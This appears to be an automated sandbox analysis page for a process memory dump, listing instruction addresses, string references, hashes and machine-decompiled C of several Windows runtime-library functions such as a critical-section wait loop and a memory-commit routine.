0x04fffab0
0x04fffab2
0x04fffab3
0x04fffab4
0x04fffabc
0x04fffac0
0x04fffb14
0x04fffb17
0x04fffac2
0x04fffac8
0x04fffacd
0x04fffad3
0x04fffad3
0x04fffadd
0x04fffb18
0x04fffb1b
0x04fffb1d
0x04fffb1e
0x04fffb1f
0x04fffb20
0x04fffb21
0x04fffb22
0x04fffb23
0x04fffb24
0x04fffb25
0x04fffb26
0x04fffb27
0x04fffb28
0x04fffb29
0x04fffb2a
0x04fffb2b
0x04fffb2c
0x04fffb2d
0x04fffb2e
0x04fffb2f
0x04fffb3a
0x04fffb3b
0x04fffb3e
0x04fffb41
0x04fffb44
0x04fffb47
0x04fffb4a
0x04fffb4d
0x04fffb53
0x0503bdcb
0x0503bdcb
0x04fffb59
0x04fffb5b
0x04fffb5b
0x04fffb5e
0x0503bdd5
0x0503bdd8
0x00000000
0x0503bdda
0x00000000
0x0503bdda
0x04fffb64
0x04fffb64
0x04fffb64
0x04fffb67
0x04fffb6e
0x04fffb70
0x04fffb72
0x00000000
0x04fffb78
0x04fffb7a
0x04fffb7a
0x04fffb7d
0x04fffb80
0x0503bddf
0x0503bde1
0x00000000
0x0503bde3
0x00000000
0x0503bde3
0x04fffb86
0x04fffb86
0x04fffb86
0x04fffb8b
0x04fffb90
0x04fffb92
0x04fffb94
0x04fffb9a
0x04fffb9b
0x04fffba1
0x0503bde8
0x0503bdeb
0x0503bded
0x0503beb5
0x0503beb5
0x0503bebb
0x0503bebd
0x0503bec3
0x0503bed2
0x0503bedd
0x0503bedd
0x0503beed
0x00000000
0x0503bdf3
0x0503bdfe
0x0503be06
0x0503be0b
0x0503be0d
0x0503be0f
0x0503be14
0x0503be19
0x0503be20
0x0503be25
0x0503be27
0x0503be35
0x0503be39
0x0503be46
0x0503be4f
0x0503be54
0x0503be56
0x0503bef8
0x0503bef8
0x00000000
0x0503be5c
0x0503be5c
0x0503be60
0x00000000
0x0503be66
0x0503be66
0x0503be7f
0x0503be84
0x0503be87
0x0503be89
0x0503be8b
0x0503be99
0x0503be9d
0x0503bea0
0x0503beac
0x0503beaf
0x0503beb1
0x0503beb3
0x0503beb3
0x00000000
0x0503bea2
0x0503bea2
0x00000000
0x0503bea2
0x0503be8d
0x0503be8d
0x0503be92
0x00000000
0x0503be92
0x0503be8b
0x0503be60
0x0503be3b
0x0503be3b
0x0503be3e
0x00000000
0x0503be40
0x0503be40
0x0503be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0503be44
0x0503be3e
0x0503be29
0x0503be29
0x00000000
0x0503be29
0x0503be27
0x00000000
0x04fffba7
0x04fffba7
0x04fffbab
0x0503bf02
0x04fffbb1
0x04fffbb1
0x04fffbb8
0x04fffbbd
0x04fffbbd
0x04fffbbf
0x04fffbbf
0x04fffbc5
0x04fffbcb
0x04fffbf8
0x04fffbf8
0x04fffbfa
0x00000000
0x04fffc00
0x04fffc00
0x04fffc03
0x00000000
0x04fffc09
0x04fffc09
0x04fffc0f
0x04fffc15
0x04fffc23
0x04fffc23
0x04fffc25
0x04fffc27
0x04fffc75
0x04fffc7c
0x04fffc84
0x00000000
0x04fffc29
0x04fffc29
0x04fffc2d
0x04fffc30
0x0503bf0f
0x00000000
0x04fffc36
0x04fffc38
0x04fffc3b
0x04fffc41
0x0503bf17
0x0503bf19
0x0503bf48
0x0503bf4b
0x00000000
0x0503bf1b
0x0503bf22
0x0503bf24
0x0503bf26
0x00000000
0x0503bf2c
0x0503bf37
0x0503bf39
0x0503bf3b
0x00000000
0x0503bf41
0x0503bf41
0x0503bf41
0x0503bf41
0x0503bf45
0x00000000
0x0503bf45
0x0503bf3b
0x0503bf26
0x00000000
0x04fffc47
0x04fffc47
0x04fffc49
0x04fffcb2
0x04fffcb4
0x04fffcb6
0x04fffcdc
0x04fffcdc
0x00000000
0x04fffcb8
0x04fffcc3
0x04fffcc5
0x04fffcc7
0x00000000
0x04fffcc9
0x04fffcc9
0x04fffccd
0x00000000
0x04fffccd
0x04fffcc7
0x00000000
0x04fffc4b
0x04fffc4b
0x04fffc4e
0x04fffc4e
0x04fffc51
0x04fffc51
0x04fffc54
0x04fffc5a
0x04fffc5c
0x04fffc5f
0x04fffc61
0x04fffc63
0x04fffc65
0x04fffc67
0x04fffc6e
0x04fffc72
0x04fffc72
0x04fffc72
0x04fffc72
0x04fffc67
0x04fffc61
0x00000000
0x04fffc5a
0x04fffc49
0x04fffc41
0x04fffc30
0x04fffc27
0x04fffc03
0x04fffbcd
0x04fffbd3
0x04fffbd9
0x04fffbdc
0x04fffbde
0x04fffc99
0x04fffc9b
0x04fffc9d
0x04fffcd5
0x04fffcd5
0x04fffc89
0x04fffc89
0x00000000
0x04fffc9f
0x04fffc9f
0x04fffca3
0x00000000
0x04fffca3
0x00000000
0x04fffbe4
0x04fffbe4
0x04fffbe4
0x04fffbe4
0x04fffbe9
0x04fffbf2
0x00000000
0x04fffbf2
0x04fffbde
0x04fffbcb
0x04fffbab
0x04fffc8b
0x04fffc8b
0x04fffc8c
0x04fffb80
0x04fffb72
0x04fffb5e
0x04fffc8d
0x04fffc91
0x04fffadf
0x04fffadf
0x04fffae1
0x04fffae4
0x04fffae7
0x04fffaec
0x04fffaf8
0x04fffb00
0x04fffb07
0x04fffb0f
0x04fffb0f
0x04fffb07
0x00000000
0x04fffaf8
0x04fffadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0503BE0F

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: ddeb312e33b638e10dfef946cb70b82c53d32a6222ea7a7b57c5f9c37002dcf0
Instruction ID: 08a25e2d729105723c6e763948cb7b7e219923c2d5bade4afaf99520fcfe149d
Opcode Fuzzy Hash: ddeb312e33b638e10dfef946cb70b82c53d32a6222ea7a7b57c5f9c37002dcf0
Instruction Fuzzy Hash: 9CA1F831B006168BEB25DF68CC51B7EB7E9BF44714F04456ADA06DB6A0FB34E906CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04FC2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E04FC2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x50b5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x50b7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E050097C0();
				}
				if( *0x50b79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x50b79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04FF1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04FE7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0505FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E05009520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E04FFE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0501DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x50b6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x50b6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E05009980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E050095D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04FE7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04FE7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E05047016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0505FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x50b5350;
							if(_t109 != 0x50b5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0505FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E05055720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x04fc2d8a
0x04fc2d8a
0x04fc2d92
0x04fc2d96
0x04fc2d9e
0x04fc2da0
0x04fc2da3
0x04fc2da5
0x04fc2da8
0x04fc2dab
0x04fc2db2
0x0501f9aa
0x0501f9ab
0x0501f9ae
0x0501f9ae
0x04fc2db8
0x04fc2dc2
0x0501f9b9
0x0501f9be
0x0501f9bf
0x0501f9bf
0x04fc2dcf
0x0501f9c9
0x04fc2dd5
0x04fc2dd5
0x04fc2dd5
0x04fc2dde
0x04fc2de1
0x04fc2e70
0x04fc2e72
0x04fc2e72
0x04fc2de7
0x04fc2deb
0x04fc2e7c
0x04fc2e83
0x04fc2e85
0x04fc2e8b
0x04fc2e8d
0x04fc2e92
0x04fc2e92
0x04fc2e85
0x04fc2df1
0x04fc2df7
0x04fc2df9
0x04fc2df9
0x04fc2dfc
0x04fc2dff
0x04fc2e02
0x00000000
0x04fc2e05
0x04fc2e0c
0x0501f9d9
0x04fc2e12
0x04fc2e12
0x04fc2e12
0x04fc2e1a
0x0501f9e3
0x0501f9e9
0x0501f9f0
0x0501f9f6
0x0501f9f8
0x0501f9f8
0x0501f9f0
0x04fc2e23
0x0501fa02
0x0501fa03
0x0501fa05
0x0501fa06
0x00000000
0x04fc2e29
0x04fc2e29
0x04fc2e2e
0x04fc2e34
0x04fc2e3e
0x00000000
0x00000000
0x04fc2e44
0x04fc2e47
0x04fc2e4d
0x00000000
0x00000000
0x04fc2e4f
0x04fc2e54
0x00000000
0x00000000
0x04fc2e5a
0x04fc2e5f
0x04fc2e9a
0x04fc2ea4
0x04fc2ea5
0x04fc2ea8
0x04fc2eaf
0x04fc2eb2
0x04fc2eb5
0x0501fae9
0x0501faeb
0x0501faed
0x0501faef
0x0501faf7
0x0501faf8
0x0501fafd
0x0501faff
0x0501fb04
0x0501fb04
0x0501faff
0x04fc2ec0
0x04fc2ec4
0x04fc2ec6
0x04fc2ec8
0x0501fb14
0x0501fb18
0x0501fb1e
0x0501fb21
0x0501fb21
0x04fc2ece
0x04fc2ece
0x04fc2ece
0x04fc2ed7
0x04fc2e61
0x04fc2e63
0x0501fa6b
0x0501fa71
0x0501fa76
0x0501fa78
0x0501fa8a
0x0501fa7a
0x0501fa83
0x0501fa83
0x0501fa8f
0x0501fa91
0x0501fa97
0x0501fa9d
0x0501faa4
0x0501faaa
0x0501faaf
0x0501fab1
0x0501fac3
0x0501fab3
0x0501fabc
0x0501fabc
0x0501fac8
0x0501facb
0x0501fadf
0x0501fadf
0x0501facb
0x0501faa4
0x0501fa91
0x04fc2e6f
0x04fc2e6f
0x04fc2e5f
0x0501fa13
0x0501fa15
0x0501fa17
0x0501fa1f
0x0501fa21
0x0501fa22
0x0501fa25
0x0501fa28
0x0501fa2f
0x0501fa2f
0x0501fa2a
0x0501fa2a
0x0501fa2a
0x0501fa31
0x0501fa34
0x0501fa36
0x0501fa3c
0x0501fa3e
0x0501fa41
0x0501fa43
0x0501fa45
0x0501fa45
0x0501fa41
0x0501fa3c
0x0501fa4a
0x0501fa4f
0x0501fa51
0x0501fa53
0x0501fa56
0x0501fa5b
0x0501fa5e
0x00000000
0x0501fa5e
0x04fc2e23

Strings

RTL: Re-Waiting, xrefs: 0501FA4A

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 577ab7154a2486188028f591ba765a309c87c463521c1631311505e9e7dc394b
Instruction ID: eac4cc376c0cd122661d5f254cdfc28907a292b7bb7f376117458e63c510fd4a
Opcode Fuzzy Hash: 577ab7154a2486188028f591ba765a309c87c463521c1631311505e9e7dc394b
Instruction Fuzzy Hash: 4C613971F00606DFDB31DF68E984B7E77E5FB40714F150699D811A72C0D778A90287A6

Uniqueness

Uniqueness Score: -1.00%

Function 05090EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E05090EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0508FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E05091074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E05009730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0508A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0508A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x50b8b04 >> 0x14) + (_v44 -  *0x50b8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04FE7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0508138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04FE7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0507FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x50b8724 & 0x00000008) != 0) {
						E050852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E050915B5(0x50b8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x05090eb7
0x05090eb9
0x05090ec0
0x05090ec2
0x05090ecd
0x0509105b
0x0509105b
0x05091061
0x05091066
0x05091066
0x0509106b
0x05091073
0x05091073
0x05090ed3
0x05090ed6
0x05090edc
0x05090ee0
0x05090ee7
0x05090ef0
0x05090ef5
0x05090efa
0x05090efc
0x05090efd
0x05090f03
0x05090f04
0x05090f06
0x05090f07
0x05090f09
0x05090f0e
0x05090f14
0x05090f23
0x05090f2d
0x05090f34
0x05090f34
0x05090f14
0x05090f52
0x00000000
0x00000000
0x05090f58
0x05090f73
0x05090f74
0x05090f79
0x05090f7d
0x05090f80
0x05090f86
0x05090fab
0x05090fb5
0x05090fc6
0x05090fd1
0x05090fe3
0x05090fd3
0x05090fdc
0x05090fdc
0x05090feb
0x05091009
0x05091009
0x05091015
0x05091027
0x05091017
0x05091020
0x05091020
0x0509102f
0x0509103c
0x0509103c
0x05091048
0x05091050
0x05091050
0x05091055
0x00000000
0x05091055
0x05090f88
0x05090f9e
0x05090fa2
0x05090fa9
0x00000000
0x00000000
0x00000000
0x05090fa9
0x00000000

Strings

`, xrefs: 05090F16

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 5c1d20e70bfe6aaac5f2d68219dbb65ad5fbe285018c38d11520013398c69897
Instruction ID: 0060f59b33859e22fa957e956ae97060ac81a69e8bfe8f4293af3eee7cce130b
Opcode Fuzzy Hash: 5c1d20e70bfe6aaac5f2d68219dbb65ad5fbe285018c38d11520013398c69897
Instruction Fuzzy Hash: A651DF713083429BD729DF28E894F6FB7E5FBC4204F04092CF99687694D671E906CB21

Uniqueness

Uniqueness Score: -1.00%

Function 04FFF0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04FFF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04FE4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E05009830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E05009990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E050095D0();
							goto L11;
						} else {
							_t109 = L04FE4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0500F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E050095D0();
										L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x04fff0d3
0x04fff0d9
0x04fff0e0
0x04fff0e7
0x04fff0f2
0x04fff0f4
0x04fff0f8
0x04fff100
0x04fff108
0x04fff10d
0x04fff115
0x04fff116
0x04fff11f
0x04fff123
0x04fff124
0x04fff12c
0x04fff130
0x04fff134
0x04fff13d
0x04fff144
0x04fff14b
0x04fff152
0x0503bab0
0x0503bab0
0x04fff158
0x04fff158
0x04fff15a
0x04fff160
0x04fff165
0x04fff166
0x04fff16f
0x04fff173
0x0503baa7
0x0503baa7
0x0503baab
0x00000000
0x04fff179
0x04fff18d
0x04fff191
0x0503baa2
0x00000000
0x04fff197
0x04fff19b
0x04fff1a2
0x04fff1a9
0x04fff1af
0x04fff1b2
0x04fff1b6
0x04fff1b9
0x04fff1c4
0x04fff1d8
0x04fff1df
0x04fff1e3
0x04fff1eb
0x04fff1ee
0x04fff1f4
0x04fff20f
0x0503bab7
0x0503babb
0x0503bacc
0x0503bad1
0x04fff215
0x04fff218
0x04fff226
0x04fff22b
0x00000000
0x04fff22b
0x04fff1f6
0x04fff1f6
0x04fff1f9
0x04fff1fb
0x04fff1fb
0x04fff1f4
0x04fff191
0x04fff173
0x04fff152
0x04fff203

Strings

@, xrefs: 04FFF124

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 087eae4e85d076ca8e7fd15000a29b9937c2cffb0c0bee31c85e373b40676742
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: B2519071604B109FD321DF19C841A6BB7F8FF48714F00892EFA95976A0E7B4E915CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05043540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E05043540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x50bd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E05000BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E05043706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0500FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E05043540;
						E0500FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0501DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E05050C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E050097C0();
					}
					return E0500B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E05043971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E05043884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0500FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E05009650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E05043787(_a4,  &_v352, _t80);
						}
					}
					L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E050095D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x05043552
0x0504355a
0x0504355d
0x05043566
0x05043567
0x0504357e
0x0504358f
0x050435a1
0x050435a5
0x0504366b
0x0504366b
0x0504366d
0x05043672
0x05043679
0x05043685
0x0504368d
0x0504369d
0x050436a7
0x050436b8
0x050436c6
0x050436c7
0x050436dc
0x050436e1
0x050436e7
0x050436e9
0x050436e9
0x05043703
0x05043703
0x050435b5
0x050435c0
0x050435c4
0x00000000
0x00000000
0x050435ca
0x050435d7
0x050435e2
0x050435e6
0x050435e8
0x050435f5
0x050435fa
0x05043603
0x05043604
0x05043609
0x0504360a
0x05043612
0x05043613
0x0504361e
0x05043622
0x05043628
0x0504362f
0x0504362f
0x05043636
0x05043638
0x0504363b
0x05043642
0x05043642
0x05043636
0x05043657
0x05043657
0x0504365c
0x05043662
0x05043669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0504358F

Memory Dump Source

